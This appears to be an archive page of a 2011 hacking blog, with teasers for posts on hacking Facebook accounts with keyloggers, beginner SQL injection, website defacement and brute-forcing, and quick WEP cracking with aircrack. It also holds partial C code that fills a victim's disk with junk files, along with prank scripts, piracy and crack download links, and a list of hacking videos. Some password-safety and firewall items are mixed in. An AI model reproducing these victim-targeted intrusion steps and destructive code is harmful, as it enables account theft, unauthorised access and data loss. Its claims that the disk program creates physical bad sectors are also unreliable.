FN SECURE: 11/01/2011 - 12/01/2011

Call Us For Workshops Or Seminars.. In Your University, Colleges, or Schools.
Email Us At : vicky@globallyunique.in

Save as PDF

HACK FACEBOOK PASSWORD OR ACCOUNTS REMOTELY



Hello friends today i will explain you how to hack the Facebook password or accounts remotely using keylogger. Its a 100% working hack and you can easily hack anyone's Facebook account or passwo

Read more

SQL Injection - Basics : HOw To

For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article  at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting 

Read more

25 Worst Passwords of 2011 [STUDY]




Pro tip: choosing “password” as your online password is not a good idea. In fact, unless you’re hoping to be an easy target for hackers, it’s the worst password you can possibly choose.

Read more

HOW TO: Protect Your Company’s Passwords


It’s almost impossible to understate the importance of having and using strong, secure online passwords. As important as it is for consumers to heed this advice, it can be even more important for businesses to use and

Read more

5 Tools for Keeping Track of Your Passwords


Time and time again, we’re warned of the importance of having strong, secure online passwords. Phishing scams — where legitimate looking e-mails and websites try to trick you into entering in your sensitive login information to

Read more

Create a Google+ Fan Page - Latest feature on G+


Google plus added a new feature named Google plus Fan page or Follower page. It is as same as Facebook Fan Page, the only difference lies in +1 and

Read more

The Dirty Details of Facebook's Porn Attack

On Thursday afternoon,Facebook confirmed that a "coordinated spam attack" has been sending a torrent of hardcore porn and gore into Facebook users' news feeds. It's not pretty. Scattered reports say that

Read more

Facebook currently has 4 VIRUSES:

BAD NEWS GUYZ

Facebook currently has 4 VIRUSES:

...
#1 ---If you get a notice of a PHOTO TAG ...


 Do not open it.

Read more

PLAY WITH CD DRIVE ***


PLAY WITH CD DRIVE ***


«Hi friends i want to share a trick with which u will be able to make fun with cd drive with basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till

Read more

How to fool a Keylogger




These days Agents spy on u everywhere, in college, at work, maybe a trojan virus on your home PC which keylogs your paswords and mails it to someone else. If u think u r being logged, try this: Whenever u have to type a password, never type the complete password in one go, ie, if your

Read more

Making ur XP Genuine Windows Genuine Advantage Validation (Latest)

works For all Versions of Windows Xp

DOWNLOAD LINK :

Read more

1000 Hacking Tutorials Downloadable

Create Bootable XP SP integrated CD,Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Data Capacity of CDs [Tutorial].txt ,Debug, Learn how crack windows.txt,Delete An undeletable

Read more

36 Graphics & Design Ebooks


Maya, Photoshop, Macromedia, Bryce, Digital Photography, & more....
Download with FlashGet


f*p://195.135.232.80/Books/design/8.books.Maya.[by.KiN_www.netz.ru].rar

Read more

10 Fast and Free Security Enhancements



Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.
1. Check Windows Update and Office Update regularly

Read more

100+ Tech Ebooks



1
10 minute guide to lotus notes mail 4.5
http://www.parsian.net/set1252/pages/books.htm




2
10 minute guide to Microsoft exchange 5.0
http://www.parsian.net/set1252/pages/books.htm
3

Read more

Format a HDD with notepad

Format a HDD with notepad

Step 1.

Copy The Following In Notepad Exactly as it says

Read more

Here is a list of 50+ FTP sites that will allow you download content for free


Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.

Read more

Converting Large Size(4.7GB) to small size(100MB)

Read more

Unable to build kernel module bug fixes in Vmware 7 and ubuntu 11.10


Just fed up last night by installing Vmware 7.1.3 on ubuntu 11.10 . The above mention erros jus pissed me off , after a long 8 hour search i got this one any

Read more

10 things to do after installing Ubuntu 11.10

Since Ubuntu 11.10 has already made some good changes in the selection of default

Read more

How to install Cpanel on virtual private server VPS



In case you want a trial licence for cpanel you should go to : http://www.cpanel.net/store/

How to Install cPanel on VPS

Read more

How to download Youtube Videos in Ubuntu 11.10








In this article we will discuss about how to download youtube videos in Ubuntu 11.10.

Read more

HACKING WITH BEAST TROJEN


Read more

HACKING WIFI WITH SIMPLE COMMANDS

 

Read more

TRACE PHISHING HACKING


 

Read more

HACK TO RUN PS2 GAMES ON PC


Read more

PHISHING EXPLOITS


Read more

SQL INJECTION TUTORIAL


Read more

BREAK XP ADMIN PASSWORD


Read more

RECOVER WINDOWS PASSWORD


Read more

HACKING WINDOWS PASSWORD


Read more

Windows 7 Cheat List


From Desktop

  1. Windows Key + Tab : Aero [press Tab to cycle between Windows]
  2. Windows Key + E : Windows Explorer is launched.
  3. Windows Key + R : Run Command is launched.
  4. Windows Key + F : Search (which is there in previous Windows versions too)
  5. Windows Key + X : Mobility Center
  6. Windows Key + L : Lock Computer (It is there from the earlier versions as well)
  7. Windows Key + U : Launches Ease of Access
  8. Windows Key + P : Projector
  9. Windows Key + T : Cycle Super Taskbar Items
  10. Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]
  11. Windows Key + M : Minimize All Windows
  12. Windows Key + D : Show/Hide Desktop
  13. Windows Key + Up : Maximize Current Window
  14. Windows Key + Down : Restore Down / Minimize Current Windows
  15. Windows Key + Left : Tile Current Window to the Left
  16. Windows Key + Right : Tile Current Windows to the Right
    [Continue pressing the Left and Right keys to rotate the window as well]
  17. Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.
  18. Windows Key + = : Launches the Magnifier
  19. Windows Key + Plus : Zoom in
  20. Windows Key + Minus : Zooms out
  21. Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level
23. Alt + Left/ Right : Back/ Forward
24. Alt + P : Show/hide Preview Pane

Taskbar modifiers

25. Shift + Click on icon : Open a new instance
26. Middle click on icon : Open a new instance
27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges
28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.
29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group

Read more

Blocking Ultrasurf with a Sonicwall Application Firewall


                            

 Organizations under pressure to keep students and employees from bypassing internet filters using client technologies, like UltraSurf are in a perpetual game of cat and mouse. A network admin I know used these steps to block it on his Sonicwall:

Ultrasurf uses “140300000101″ for SSL ehlo messages. If you can block this signature with the your firewall you can block ultrasurf. To do this follow these steps:

  1. Create a custom object in Firewall/Application Object section. Lets say the name of the object is “Ultra”
  2. Application object type must be “Custom object”
  3. Match Type must be “Exact Match”
  4. Input Representation must be “Hexadecimal”
  5. Then add Content “140300000101″
Then go to Object Policy/Application Firewall Policy Settings:
     
  1. Policy name: write whatever you want
  2. Policy type “Custom Policy”
  3. Adress Source “Any”, Destionation “Any”
  4. Service Source “Any”, Destionation “Any”
  5. Exclusion Adrsss “None”
  6. Application Object “Ultra Object” **Select the object which you write in the first section
  7. Action “Reset/Drop”
  8. Users/Group Included “All”, Excluded “None”
  9. Schedule “Always On”
  10. Enable loging “Check”
  11. Redundancy Filters “Use Global settings checked”.
  12. Connection Side “Client Side”.
  13. Direction “Basic” Both
  14. Dont forget to enable the Application Firewall feature. This is a bit easier to do on a Palo Alto firewall since the application is already identified natively by the box, you just have to block it in one of your threat profile policies.
               
       "No more Orkuting,no more facebook sorry to students

Read more

PLAY PS3 GAMES ON YOUR PC





Playstation 2 Emulator is a program that can load Playstation 2 GAMES and play it on PC ComputerPlaystation 2 Emulator
by Click-2U contains all Plugins and all BIOS From Click-2U Modders. It's a good idea too play ps2 games on pc



DOWNLOAD LINK :

http://rapidshare.com/files/1389864/Emulators_PSX_2_to_PC.exe

Read more

Botnet : What Is It?




This article is designed to explain botnets, give an example of usage, and provide some good examples.


[What]
A botnet is a group of computers or servers all compromised with the same backdoor. The interesting thing about botnets is that these backdoors often have the ability to interact with other members of the botnet, and can also be controlled by the botnets owner. This can result in a single command, e.g. DDoS Microsoft.com, to flow down a chain of command in an instant, telling each member of the botnet to follow it. They also often leave backdoors accessible to the botnet user, and some even have built-in protocols for updating themselves. There are multiple chains of command that have been used in botnets, and these are:



P2P botnets, using these a command can be sent by the hacker to a single member of the botnet, and this single botnet will pass the command on to a handful of other members, which will carry on the chain and so on and so forth. the advantages of this are you cannot stop the botnet by taking out one member, but you would have to block the botnet completely. The problem is it is easy for individual bots to become separated from the rest of the net, usually resulting in being fixed.
Heirarchial botnets, which have different members assigned “ranks” in the command chain and are given specific bots to manage. Using this, the hacker might send a command to 4 different bots, which each pass the message on to 100, which each pass it on to 100. The problem with these is that the botnet can be shut down by removing the hack from one of the higher-up bots. The good thing about these is they can be very easily automated, and can pass reports of the computers up the chain as well as pass exploit upgrades down.
and single server bots, which all take their commands from one computer, these are very easy to make but are near enough useless.
 
[Propagation]
Botnets can be propagated by the hacker themselves, eg whenever they root a server or trojan a computer they add their program in too, run it and that computer becomes a bot. Another way is by mimicing worms and spreading through emails, p2p or instant messaging. Be imaginative, there are many ways of propagating that havent been tried yet.

[usage]
I will give an example of how a p2p botnet would be structured.
The bots propagation method is by exploiting a flaw in the security system of linux, and uses it to get root access.
The bot has a p2p structure, and can pass patches down the chain as well as commands.
The bot is automated by adding any computers it hacks to its own list of child bots(ones under its own command), and runs a check similar to ping to test if the net is up on the child before sending commands/patches.



[Famous Examples]

The storm worm:
This is an email-spread worm that takes over windows machines and injects a driver into the windows kernel to keep root. It currently has control of between 1- and 10- million windows machines around the world. It is extremely flexible, and has avoided gaining a signature for a massive amount of time.
There are many of examples on wikipedia of these, and google yields some interesting results.

Read more

WEP Cracking( In Just 2 Minutes )


 
Okay, before we begin, I give you my fun facts on WEP.
FUN FACTS:
-WEP stands for Wired Equivalent Privacy
-WEP is used to secure wireless networks from eavesdroppers
-WEP usually takes hours to crack

WEP has always been a long and tedious job, untill recently, when two FBI agents demonstrated how it´s possible to crack WEP in under 4 minutes (3 to be exact).
Here is how they did it:
1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.

PROGRAMS USED:

-Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.

You can download it at www.kismetwireless.net
A windows version can be downloaded at http://www.renderlab.net/projects/wrt54g/kiswin.html

-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)
Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.
Airdecap is used to decrypt WEP/WPA capture files.
Airmon can be used to configure the wireless card.

Read more

Trace An Email weather its real or fake


Generally, the path taken by an email while traveling from sender to receiver can be explained by following diagram.
 
So here is the method of tracing the exact location from the email sent.I am showing the email tracing on yahoo here but gmail and other mail providing services have same concept.

Step 1:-First open up your email account and click on your inbox.
 

Step 2:-Now Select any email that you want to trace 
 

Step 3:-After Opening scrool the mail at the end and in right corner you will see a option FULL HEADER click on it
 

Step 4:- Now Closely Look at the the header you will find the whole detail that from which IP address it is sent.
 

Have a close eye on these contents

1. Received From: - 127.0.0.1(EHLO mail-qy-f200.google.com) (209.85.221.200)
The IP address at last is the real IP address of the person who is sending this mail.

2. To see the proper location of this IP address Go to www.whatismyip.com or www.whois.domaintools.com .These websites help you to find the whole detail and satellite images of the ISP location from the Email was sent.



Vickys' Suggestion:- "After finding the IP address of the sender I recommend to use www.whois.domaintools.com to get satellite image of the location from the mail is received."

Read more

Remove shutdown from start menu

=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so)
Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible.
 This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run.
 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
- You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
 
2. User configuration -> administrative Templates -> start menu and taskbar ->
 3. This option opens up a pane on the right hand side. Identify the option named
- Remove SHUT DOWN on the start menu .
 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings.
 6. Just change the radio button TO ENABLED and say apply. 7. DONE.



No need to log off or restart the system. (You may however have to find 
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL - ALT - DEL options.
 This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by 
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
 


or u may create a shortcut using this shortcut location to shutdown ur system



%windir%\system32\shutdown.exe -s 


to restart, u can use this shortcut


%windir%\system32\shutdown.exe -r

Read more

Create Bad sectors on hard disks



/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);




// I'am Not responsible for this, complete the rest of it YourSelf..!!

Read more

Hacking a website or its member section



First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
 
DefacingYou can deface the site through telnet or your browser by running remote commands on an old or misconfigured server, the hard thing to do is find an old server , maybe a network of a school or university would do,get a CGI BUG searcher.This program will scan ranges of IPs for web-servers and will scan them for known bugs in their cgis or other bugs and holes.You can learn how to exploite a certain hole by adding in yahoo the name of the bug/hole and the word exploit,search for “cmd.exe exploit”.There are more than 700 holes that many servers might have! You can also deface a website by finding the ftp password and just browse through the sites ftp and replace the index.htm.You do that with the :


Brute forceTo do that you need a brute forcer or brute force attacker and some word lists,the brute forcer sends multiple user/pass requests of words that picks up from namelists and tries to hack the account untill it does! So lets say imagine a porn site that asks for a password , you go there you copy their address , you add the address in a program called brute forcer and then from the brute forcer you choose a text file with names to be used as usernames and a text with names to be used as passwords,the brute forcer will try untill it finds a correct user/pass This should be easier for the newbies than exploiting cgi bugs , many of the newbies havent even heard of it i hope i didnt confuse you with this tutorial there might be more tuts about web hacking and cgi bugs and such.Till then try to find the way to cgi bugs yourself with the cgi scanners in the Web Hacks section or download a brute forcer to crack accounts.




WARNING:- This Article For Just Education Purpose Only

Read more

Hacking Video Tutorials



128 Bit Wep Cracking With Injection!.swf
A Penetration Attack Reconstructed.avi
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
Adding Modules to a Slax or Backtrack Live CD from Windows.swf
Airplay replay attack - no wireless client required.swf
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
BackTrack LiveCD to HD Installation Instruction Video .swf
Basic Nmap Usage!.swf
Basic Tools for Wardriving!.swf
Bluesnarfer attack tool demonstration.swf
Bluesnarfing a Nokia 6310i hand set.avi
Breaking WEP in 10 minutes.avi
BufferOverflowPart2-Shellcoding ByIDEspinner.avi
BufferOverflowPart3ExploitsByIDEspinner.avi
Cain to ARP poison and sniff passwords!.avi
Complete Hacking Video using Metasploit - Meterpreter.swf
Cracking a 128 bit WEP key (Auditor).swf
Cracking a 128 Bit Wep key + entering the cridentials.swf
Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf
Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf
Cracking WPA Networks (Auditor).swf
DoS attack against Windows FTP Server - DoS.avi
Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf
Exploiting some bugs of tools used in Windows.swf.swf
Exploiting weaknesses of PPTP VPN (Auditor).swf
Finding Rogue SMB File Shares On Your Network!.swf
Fun with Ettercap Filters!.swf
hack.txt
How to crack the local windows passwords in the SAM database .swf
How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf
How to sniff around switches using Arpspoof and Ngrep!.avi
IDEspinner Buffer Overflows pt1.avi
IDEspinner Feature Addition pt1.avi
IDEspinner Feature Addition pt2.avi
IDEspinnerDNS-PoisonRouting.avi
Install VNC Remotely!.avi
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi
John The Ripper 1.7 password cracker Installation Instruction Video .swf
Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf
MAC Bridging with Windows XP and Sniffing!.swf
Mass De-Authentication using void11 (Auditor).swf
Metasploit Flash Tutorial!.swf
MITM Hijacking.wmv
Nmap Video Tutorial 2 Port Scan Boogaloo!.swf
Sniffing logins and passwords.avi
Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res).avi
Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi
Sniffing VoIP Using Cain!.swf
Snort Instruction video - howto install into backtrack.swf
SSH Dynamic Port Forwarding!.swf
Start a session and get interactive commandline access to a remote Windows box!.avi
Telnet Bruteforce.avi
Tunneling Exploits through SSH.avi
Use Brutus to crack a box running telnet!.avi
Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf
WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
WMF File Code Execution Vulnerability With Metasploit!.swf
WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf

Download:
http://rapidshare.com/files/112986178/Huge_Collection_Of_Hacking_Videos.part1.rar
http://rapidshare.com/files/112993588/Huge_Collection_Of_Hacking_Videos.part2.rar
http://rapidshare.com/files/113000538/Huge_Collection_Of_Hacking_Videos.part3.rar
http://rapidshare.com/files/112963118/Huge_Collection_Of_Hacking_Videos.part4.rar
http://rapidshare.com/files/112969973/Huge_Collection_Of_Hacking_Videos.part5.rar
http://rapidshare.com/files/112975843/Huge_Collection_Of_Hacking_Videos.part6.rar
http://rapidshare.com/files/112979640/Huge_Collection_Of_Hacking_Videos.part7.rar

Read more

Save this Page

Download as PDF